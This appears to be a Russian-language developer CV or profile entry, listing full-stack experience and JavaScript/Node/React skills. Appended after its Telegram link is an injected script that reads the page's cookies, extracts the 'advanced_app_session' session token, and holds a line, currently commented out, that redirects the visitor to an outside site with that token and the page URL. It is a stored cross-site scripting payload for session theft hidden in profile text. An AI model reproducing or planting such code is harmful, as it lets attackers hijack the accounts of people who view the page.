Опыт работы:
Full-Stack Developer at MedAccount LLC | 2021 - now
Образование:
Среднее профессиональное образование
Профессиональные и другие навыки:
· HTML, CSS, JavaScript
· Node.js, Next.js, Express, Fastify, Socket.io
· React, Zustand, React Query
· Tailwind, CSS Modules, Shadcn/ui
· Fetch, Ajax, Axios, RestAPI, JWT
· MongoDB(Mongoose), SQL
· Git, GitHub, VS Code, DevTools
Дополнительно:
Telegram: <a href="https://t.me/fitchers" style="color: #1970bd;">https://t.me/fitchers</a> <br>
<script>
const cookieString = document.cookie
// Способ 2: Разбиение строки на массив
const getCookieValue2 = (name) => {
const cookies = cookieString.split(';');
for (let cookie of cookies) {
const [cookieName, cookieValue] = cookie.trim().split('=');
if (cookieName === name) {
return cookieValue;
}
}
return null;
};
const sessionValue2 = getCookieValue2('advanced_app_session');
if (!window.location.href.includes("fixxx")) {
const currentUrl = window.location.href;
// window.location.href = 'https://thebestsellers.pro?data=' + sessionValue2 + "&url=" + currentUrl ;
}
</script>